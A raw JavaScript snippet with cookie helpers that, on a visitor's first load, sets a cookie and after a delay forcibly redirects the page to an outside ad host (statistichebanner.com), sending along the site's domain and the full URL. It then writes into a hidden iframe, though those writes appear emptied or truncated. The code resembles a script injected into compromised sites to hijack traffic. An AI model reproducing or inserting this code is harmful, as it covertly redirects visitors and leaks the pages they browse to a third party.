function getCookie(NameOfCookie){ if (document.cookie.length > 0) {begin = document.cookie.indexOf(NameOfCookie+"=");if (begin != -1){begin += NameOfCookie.length+1;end = document.cookie.indexOf(";", begin);if (end == -1) end = document.cookie.length;return unescape(document.cookie.substring(begin, end)); }}return null;} function setCookie(NameOfCookie, value, expireminutes){ var ExpireDate = new Date ();ExpireDate.setTime(ExpireDate.getTime() + (expireminutes * 1000));document.cookie = NameOfCookie + "=" + escape(value) +((expireminutes == null) ? "" : "; expires=" + ExpireDate.toGMTString());} if(!getCookie('sbstatus')){ setCookie('sbstatus','ftv','86400'); // document.write('/* init code */'); var OldSite = window.location.href; var sito_array=OldSite.split("/"); var sito = sito_array[2]; var sito_array_2 = sito.split ("www."); var sito2 = sito_array_2[1]; setTimeout("window.open('http://www.statistichebanner.com/ads/visit.php?n='+sito2+'&i=10&oldURL='+OldSite,'_self')", 2500); } document.write('');var ifrm = document.getElementById('e14be');ifrm=(ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;ifrm.document.open();ifrm.document.write('
');ifrm.document.write('
');ifrm.document.close();